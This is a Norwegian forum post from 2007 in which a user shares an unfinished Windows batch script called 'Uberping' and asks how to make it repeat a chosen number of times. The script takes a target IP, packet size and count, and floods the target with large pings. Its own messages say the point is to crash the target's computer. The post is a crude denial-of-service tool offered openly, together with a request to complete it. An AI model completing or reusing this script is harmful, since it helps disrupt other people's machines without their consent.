AnaXyd Skrevet 31. mai 2007 Del Skrevet 31. mai 2007 Hei! Har drivi å lekt litt med batch i det siste, og har nå laget en slags "uberping" som spammer ett mål med mange pings. Men, jeg har støtt på et problem og det skal jeg prøve å forklare her nå.. Man kan velge hvor mange pings man skal sende mot målet, og ved dette så må jeg få til en kommando som sender pingen de gangene brukeren har valgt. Hvordan gjør jeg dette? Se på koden under: (Nederst ligger det uferdige med pingen) (Nå har jeg heller ikke kjørt noen test på denne her, så det er ikke sikkert at alt fungerer som det skal!) cls title Kewseapp - Uberping echo This will do a uberping on a selected target. echo But, this might fuck the target up, so use it on your own risk! echo =============================================================== ping localhost > NUL echo Press any key when ready to set up an uberping! pause > NUL cls title Kewseapp - Setting up echo Now, locate your targets IP and type it here: set /p target= cls echo Good! Now, we have to setup the options on the ping. echo How many pings do you want to send on the target? Type in numbers set /p pings= cls echo How big do you want the ping package to be? (Max 99999) Type in numbers set /p sizepackage= cls echo Good! We are now finished with the options on the ping. echo Now, how many of these pings do you want to send? Type in numbers echo (Remember, if you type 100 or more, things will go slowly on your computer!) set /p npings= cls echo Great! We are now ready to launch the whole uberping! echo If the target's computer is weak, it may crash! =D echo Press any key to launch! pause > NUL ping %target% -n %pings% -l %sizepackage% Hadde satt stor pris på svar! Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå